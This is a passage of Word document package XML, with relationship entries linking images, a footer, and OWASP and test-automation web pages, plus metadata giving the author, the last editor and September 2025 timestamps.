Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-top-ten/" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bugbug.io/solutions/test-automation-for-qa/?utm_source=chatgpt.com"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footer" Target="footer1.xml"/><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yperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Shee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0A1BC9-B6E6-4BBE-9453-38CC8B7BEC4C}">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BA85-646E-46DC-ABD8-8372459C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9817</Words>
  <Characters>5399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Albert Cárdenas Carrasco</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>joel quispe</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-09-22T19:51:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-22T19:53:00Z</dcterms:modified>
</cp:coreProperties>
</file>